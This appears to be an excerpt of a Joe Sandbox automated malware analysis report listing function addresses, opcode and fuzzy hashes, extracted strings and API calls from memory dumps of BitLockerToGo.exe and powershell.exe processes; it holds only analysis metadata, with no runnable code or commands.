Similarity

API ID:
String ID: :Y>_
API String ID: 0-1739490814
Opcode ID: 096408c187cf6b03a7a4ff16736b4373f409204f5f9e8a025d305734b68a6627
Instruction ID: b0d1875c70939ba96addd0d62e418db16c7faeb9bbccfb7fd4a0a60ec21dc510
Opcode Fuzzy Hash: 096408c187cf6b03a7a4ff16736b4373f409204f5f9e8a025d305734b68a6627
Instruction Fuzzy Hash: B26116B0001B019FD3248F25C6A4B22BBF1FF45318F649A8DC4AA5BB95D779F856CB84

Function 02ED37B6 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

/.)(, xrefs: 02ED3808

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)(
API String ID: 0-2587180175
Opcode ID: 4356f2a355a0ddb5d77ea1a092b26c1914c47d7e4be5f8574e7d4ae0569d810b
Instruction ID: 0bd2dbccaf2195211425fe8319a4cce07689a8309061c504faa8a7799fc1d490
Opcode Fuzzy Hash: 4356f2a355a0ddb5d77ea1a092b26c1914c47d7e4be5f8574e7d4ae0569d810b
Instruction Fuzzy Hash: 6D1189B6A883819BD328CF04C09032BBBB2EBC6308F14981DE5C907694C730E842CF86

Function 02EB8960 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c25439432b1b14c8c339b8c95c4aad5167b548f65e3ec4e1c55e5033c6322fd
Instruction ID: 6e5003b9794b2407a66b7d64c3aa592f0a7919d1b38b23bb1836fa951d30dc0a
Opcode Fuzzy Hash: 7c25439432b1b14c8c339b8c95c4aad5167b548f65e3ec4e1c55e5033c6322fd
Instruction Fuzzy Hash: 6752DF316483118BC726DF18D8906FBB3E6FFC4308F159A2DDA9687382D735A955CB82

Function 02EEB5A0 Relevance: .8, Instructions: 808COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ff06e29bef3490ee750a5cdaf6c5fbe90b60bea94c8ca1d7f05376b01b7431
Instruction ID: 32caec37b5d3f419b40ee6c001acc5d9948f161327640f2fcda27fb2c69f6e3e
Opcode Fuzzy Hash: 22ff06e29bef3490ee750a5cdaf6c5fbe90b60bea94c8ca1d7f05376b01b7431
Instruction Fuzzy Hash: 4C52CD34A88201CFC714CF29D4A0A66FBF2FB8A314F59C9ADD59A8B751D734E851CB80

Function 02EEB700 Relevance: .7, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e50ec53821c006bc2d218594a6a70aff45b96683fc903e098a1311951882293
Instruction ID: b8a4dfcb0e398ee047cd2a7e8ced2f64112394a2c3a24b40978397b5e0f2039e
Opcode Fuzzy Hash: 8e50ec53821c006bc2d218594a6a70aff45b96683fc903e098a1311951882293
Instruction Fuzzy Hash: EF42CE34A88201CFC714CF29D4A0656FBF2FB8A318F59C9ADD59A8B755D335E851CB80

Function 02EEB840 Relevance: .7, Instructions: 703COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c27a585d77da08b89e5ba35a2b94eb73c99627edd4e5c49291f65613abff869
Instruction ID: 102ef0b18995926f141532e4ff69a3ef8fcc2b6e29e1386819812a9daf43889f
Opcode Fuzzy Hash: 9c27a585d77da08b89e5ba35a2b94eb73c99627edd4e5c49291f65613abff869
Instruction Fuzzy Hash: 3D32BD70688601CFC714CF29C4A0666BBF2FF8A318F59C9ADD59A8B395D735E851CB80

Function 02EC3DE6 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e018c28a066c1dd8bb2ddd8bc16fd0d8101d232570f0842bdaeffe46e0e89b
Instruction ID: b450874229d52dff20d969a85f915cb5a37c8961503ae05cb77578d759e09ddb
Opcode Fuzzy Hash: d5e018c28a066c1dd8bb2ddd8bc16fd0d8101d232570f0842bdaeffe46e0e89b
Instruction Fuzzy Hash: 58E100B0640B408BE335CF64C590BA3BBF1BF45304F149E2DD5AA87AA5E735F8098B64

Function 02EC30F6 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a139fd94d03d074277f70f5168bd0088a17c10045afd29af08de246661b29d7f
Instruction ID: 31b7b4fe1b59b28ae6aa04fc5c1737a079303006768cb081ebbcce4aba95e460
Opcode Fuzzy Hash: a139fd94d03d074277f70f5168bd0088a17c10045afd29af08de246661b29d7f
Instruction Fuzzy Hash: 96D103B0640B408BE736CF35C490BA3BBF1BF45304F149A6DD5EA87AA5E735E8098B54

Function 02ECB920 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a516c7d6acc521e2393e8d84e0e67b0943c7857d48de5ead52d14a9fa09e1159
Instruction ID: cf4b5c0d9d7968950b0024139e79be9cf59eae930e50db42962990a8c2ca841d
Opcode Fuzzy Hash: a516c7d6acc521e2393e8d84e0e67b0943c7857d48de5ead52d14a9fa09e1159
Instruction Fuzzy Hash: 0FB1CE715482108BC724CF18C8A27ABB3F1EF9536CF28D61DE8955B391E335E906CB92

Function 02EC3678 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ece6586775ac9d1530f51bc199729e638f83f3d6eace3cf54fec2914d1b9cd2
Instruction ID: ef554066c1cb413ba75044d75a191fb4cd52654c99744243a53c1feda8e324df
Opcode Fuzzy Hash: 2ece6586775ac9d1530f51bc199729e638f83f3d6eace3cf54fec2914d1b9cd2
Instruction Fuzzy Hash: 57B1D471A44B018FD728CF29C890666B3E2FF89314B28E96DD99787795EB34F452CB00

Function 02ECEC06 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c73a1fa01377c58c4772a757f4c99c244b855286bfecfbf8538ae23515e5b7
Instruction ID: c341e9b71bcdfa8137e1bda2fb81bbf20093232d40747a7b81dd33c290b304e6
Opcode Fuzzy Hash: 37c73a1fa01377c58c4772a757f4c99c244b855286bfecfbf8538ae23515e5b7
Instruction Fuzzy Hash: 82A19E35A94B41CFD768CF2AC490A22B3F2FF89315B5989ACD58687B51D731F8A1CB00

Function 02EC3A2A Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a631cf9774d8d61bf4e3bd680822faecca51c11ab26b6792abd4cd6806838f5
Instruction ID: 9925880471747272048304668796ae2e7ba67471a8f599ccee8081a93fc61d4e
Opcode Fuzzy Hash: 4a631cf9774d8d61bf4e3bd680822faecca51c11ab26b6792abd4cd6806838f5
Instruction Fuzzy Hash: 9361B1B0A80B008FE729DF75D990B63B3E6AF89304F24E86CD69687655EB71F441CB50

Function 02EC1D52 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10da55844631e2e9bd156a321fea25bb65350cf920f77ad855f2c1ab8031f35
Instruction ID: 9b8eb15867f4b081404cc6a39d2f3fb9c8c1460d84c6dde19d13660dfbfeab68
Opcode Fuzzy Hash: e10da55844631e2e9bd156a321fea25bb65350cf920f77ad855f2c1ab8031f35
Instruction Fuzzy Hash: 10617FB0640B418FE726CF68C990766B7E5FF46314F24A92CE49ACB792E774E441CB80

Function 02ED6210 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5304fcc587d5678457e1b2f5345415f573820826b3f0510e4626012c4714251
Instruction ID: 7b22273a84cf577dd8085f5ff9a6018d0998426d4dc1e0ff32256a6026a18822
Opcode Fuzzy Hash: c5304fcc587d5678457e1b2f5345415f573820826b3f0510e4626012c4714251
Instruction Fuzzy Hash: 5A51F371A483541FD725CE38988076BBAD9AB8222CF08D63DF8A98B3C1D734D809C791

Function 02EC43E5 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb30f59446aa3b1651e84a2248e93dbde334518af68fffa4de753d87a5960d81
Instruction ID: c15daae3fca0358fe33ce7936f9e97064c5a3ec184cae9e0be16a7558adc8443
Opcode Fuzzy Hash: bb30f59446aa3b1651e84a2248e93dbde334518af68fffa4de753d87a5960d81
Instruction Fuzzy Hash: F5615474A40F018BE325CF26C4A1B53B7F1EF45318F14992DD9E687AA1D739F48A8B44

Function 02EC66B0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e79e11f5acfda87f3e3868071d08fa9d5be27303d5baebaf5417e369758e37
Instruction ID: 7c603ad4214dd678ef98ead114883456393cb772bdbc2c067801173b5dbcd9f1
Opcode Fuzzy Hash: c5e79e11f5acfda87f3e3868071d08fa9d5be27303d5baebaf5417e369758e37
Instruction Fuzzy Hash: 5E4138B69483044BD7119FA4DA8476BB7DCAFD1318F29AA3CE88887391E771D805C791

Function 02EB38D0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25c91af3de49dd89b6b3f4387ff5dbf682b06aaf89be2b5eae7074ce3bc2388
Instruction ID: 49c50c807266586bd772e5515ce39e61a1dc55cf4a8d68056e34cd8d3bf8be2d
Opcode Fuzzy Hash: d25c91af3de49dd89b6b3f4387ff5dbf682b06aaf89be2b5eae7074ce3bc2388
Instruction Fuzzy Hash: 9D41E922B481614BCB198A3DCC512BBBBD39FC5249F1DD579ECC9DB34AE674D9008790

Function 02EB2DD0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397b4e95b5fa5a71a68d653741c8372383a62cb40a32af2d3cbbf835a96baffc
Instruction ID: 6da332c07ebfe3ccbf7f2c92c8a4abd7264e447e902584d7517c0b54c6e6766f
Opcode Fuzzy Hash: 397b4e95b5fa5a71a68d653741c8372383a62cb40a32af2d3cbbf835a96baffc
Instruction Fuzzy Hash: 3431FE746442019BC7179E2AC8806A7B7E1EF8431DF14E92CED9ACB351D331D843CB52

Function 02EE1BF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5350ed73a497343eaee281a1b420797da51e947076bc07410e862b784af1a79b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 1211CA336851E40EC7198D3C84005E97FA30A93179B59D399E4B9DF1D2D6328DCA9354

Function 02ED65F0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b563c44b3fa0a2819769ba8dc05c896ad3de75dc77d5297ba0da4099a0c848
Instruction ID: 725e64e182b95fe3726e53919c70a902ca3b87867b1b0dc8b0b5a80bb58f8be7
Opcode Fuzzy Hash: 32b563c44b3fa0a2819769ba8dc05c896ad3de75dc77d5297ba0da4099a0c848
Instruction Fuzzy Hash: 9A01D4F968030147DB209F50B4C0B27B2BDAF8170CF08E53CE92857241EB71F80ACA91

Function 02EC1937 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c5cc63a331d697be9a85cc62796f67cbe0500bebd542c3872c16e77f914160
Instruction ID: 7edb5832312b26659bfdb68b800309ce7866674d6940d96f8b6c494de83fffef
Opcode Fuzzy Hash: 27c5cc63a331d697be9a85cc62796f67cbe0500bebd542c3872c16e77f914160
Instruction Fuzzy Hash: 37018071A04B818FD326CB1AC490666BBF2AF56304F18589DD4CBC7A62D724E445CB15

Function 02EC6EF8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ace0fbc49c9d521b01612636e5d1dcd821869d73578c330851836bbdd2c5109
Instruction ID: b30d90c18cba2bdf563a1b72d05febd9ca3c8188092197f8ca2d69ce081f15dd
Opcode Fuzzy Hash: 7ace0fbc49c9d521b01612636e5d1dcd821869d73578c330851836bbdd2c5109
Instruction Fuzzy Hash: 971118706883818BD719CF11D5A062FB7E2FFC9208F299E2CE1E61B785C7349416CB5A

Function 02EB3A80 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ef38b90ce7a23c00e0e8b889341b0da126878721bf406344124ea789d50c23
Instruction ID: 5c41a205f76e7a3ad965801fb571baa26f6c3b137bc523be20fa346e2ce0fe13
Opcode Fuzzy Hash: 23ef38b90ce7a23c00e0e8b889341b0da126878721bf406344124ea789d50c23
Instruction Fuzzy Hash: 88F0E9777951165BAB21CC6AD8C0977F396EBC6119B19987CE945F3201C531E40183D0

Function 02EE6710 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
Instruction ID: 2bc43229d8f9d0124d59ec089037abeaca0151c4daa21a03baaa5d3dd6d6bf69
Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
Instruction Fuzzy Hash: 58E0CD7AB55611065B68CE169801677F3E5EAD6715B4CF52DD442D3108D234C4404164

Function 02EBE450 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 48224bb7dcbe9c5be87e1971e4999b6b0b8be21a886783792d34dc9c4b8b7dcb
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: B4D0A7615887B50E57598D3844A04F7FBF8ED4B51AF5C64DEE4D2E3109D324D8054698

Function 02EEA706 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d8efe6d5a974d57340528c82d7ccc39d9f09743d1eea503a7854d204b67cbe
Instruction ID: 0769264d592beb15d230f9b246fe74504ee50215f1193d5603fc2d0e579f9a71
Opcode Fuzzy Hash: 99d8efe6d5a974d57340528c82d7ccc39d9f09743d1eea503a7854d204b67cbe
Instruction Fuzzy Hash: A7A00234EC81008B814CCE1190508B1E335A797101E517409D165335408A11D455991D

Function 02EDB8EE Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 226COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 02EDB8F8

Strings

k, xrefs: 02EDBAC6
u, xrefs: 02EDBAD6
l, xrefs: 02EDBAB6
g, xrefs: 02EDBABE
W, xrefs: 02EDBAA6
r, xrefs: 02EDBACE
h, xrefs: 02EDBAAE

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: String
String ID: W$g$h$k$l$r$u
API String ID: 2568140703-629726492
Opcode ID: da1b1c9ac3754ced71162eecdec37c3a1bdccbaf79a90956d42ed35e94bf069b
Instruction ID: e213a55c78c44d29242bc180d09f8db23a0872b791df8f81e83bb3b4537dcf79
Opcode Fuzzy Hash: da1b1c9ac3754ced71162eecdec37c3a1bdccbaf79a90956d42ed35e94bf069b
Instruction Fuzzy Hash: 0891C472A4C7818FC735CA2CC4943DEBBD2ABE5314F098A2CD4D98B385EA759446CB52

Function 02EDF5D6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 02EDF654
GetSystemMetrics.USER32 ref: 02EDF665
DeleteObject.GDI32 ref: 02EDF6C7
SelectObject.GDI32 ref: 02EDF715
SelectObject.GDI32 ref: 02EDF7A9
DeleteObject.GDI32 ref: 02EDF7E0

Strings

, xrefs: 02EDF77C

Memory Dump Source

Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: a8bb499868ab5ee60a1e1ceabd5bfbb5d55fcf9c97934916fc2deaedbd6ad78d
Instruction ID: 6c92f1aa802b0809cfdad4eadf66341c3d2564edd9d502580f17001c5437fe1c
Opcode Fuzzy Hash: a8bb499868ab5ee60a1e1ceabd5bfbb5d55fcf9c97934916fc2deaedbd6ad78d
Instruction Fuzzy Hash: 5B817DB4A04B40DFC390EF29D585A16BBF0FB89304F50892DE99AC7755D731A858CF92

Analysis Process: powershell.exePID: 6872, Parent PID: 4688COMMON

Executed Functions

Function 00007FF7C08B4070 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7C08B48AD

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3ccf32636bff9f09f77a0694aa7dcd55c7f56339517070cf3da103ed6915996a
Instruction ID: 753f64ec370a627ca119193911f445981b4c23203d0fc8c6a2bfbd10e5647bbb
Opcode Fuzzy Hash: 3ccf32636bff9f09f77a0694aa7dcd55c7f56339517070cf3da103ed6915996a
Instruction Fuzzy Hash: 2E516B30A0C9594FE768FA1CAC456B6BBD0EF99331F14517AE88DC33A2CA15AC9183D1

Function 00007FF7C08B1470 Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968ade72f43b98efbb54aa762431712a9b1a71ba46fea7b7135e064c1463d165
Instruction ID: 0b2fbfeb25657b1db204fe96d63e11c3751846eb586236ca5076ac1365c55bfd
Opcode Fuzzy Hash: 968ade72f43b98efbb54aa762431712a9b1a71ba46fea7b7135e064c1463d165
Instruction Fuzzy Hash: F6221A3460894D8FDB98EF1CC898AA977E1FF69311B0501A9E85ED73A1DB35EC51CB40

Function 00007FF7C08B448D Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8cc44d7b818f6f2e33c38b85ff1f3179167943ccd8d206efdd9eb21d3ecdf06
Instruction ID: 203d53151eb97485cc9921c8b61db8c2d53e65d4c89a7c7a7144bdfccf8aebe9
Opcode Fuzzy Hash: c8cc44d7b818f6f2e33c38b85ff1f3179167943ccd8d206efdd9eb21d3ecdf06
Instruction Fuzzy Hash: A0815431F18D1E4BEB94FB6898555BDA3D2FF58760B804275D40EC32D6DF28B8428791

Function 00007FF7C08B75F5 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0134b3c8f9d183bdabbc80397fc0bbef91fd424a63087c17bdadbbd1bfe32994
Instruction ID: de2f120a2fa7c0eb68dfcf40973c9b5ecdf93ab9fc0a8215116bb9552d9147cb
Opcode Fuzzy Hash: 0134b3c8f9d183bdabbc80397fc0bbef91fd424a63087c17bdadbbd1bfe32994
Instruction Fuzzy Hash: 6671F721A0C95A8FE755EF2C98552F9BBE1EF96261F8442B7C44DC32C2CF28781587E0

Function 00007FF7C08B13C0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e794ecf56fdd46701e4cdd06ae0dd5465748b8dbc281a53bfd9c024ce2cef9c
Instruction ID: 7be19c240c1d5ecdcac9a47dd049075c2936c40bdfa69bb75ede155d1b7c970f
Opcode Fuzzy Hash: 8e794ecf56fdd46701e4cdd06ae0dd5465748b8dbc281a53bfd9c024ce2cef9c
Instruction Fuzzy Hash: 0651E331A0C9184FDB59EB2898567B9B7E1FF85320F4441BAD80EC7296DE24BC5287D1

Function 00007FF7C08B3B08 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0224168a29acd2e783bae9a71842fbf2569d43f0932ddc6284c30ab862858916
Instruction ID: 53e2df20f6c655aec829b3a7925cd268f0ab9a7e5e449a48c49af2fbdae88598
Opcode Fuzzy Hash: 0224168a29acd2e783bae9a71842fbf2569d43f0932ddc6284c30ab862858916
Instruction Fuzzy Hash: BB512621B0CE4A4FE755BB3C5C5A2B9BBD1DF89220B4441FBD84DC3292DE29B85683D1

Function 00007FF7C08B9240 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
Instruction ID: 8d8f64367d2971bd231c3a6d09d3291d773e2ba822151b3f41d828e4db0393b7
Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
Instruction Fuzzy Hash: 7841E63131981C8FDA94EB1CE898E6877E1FF6C31275605E6E44ACB375DA26EC81CB40

Function 00007FF7C08B8C55 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
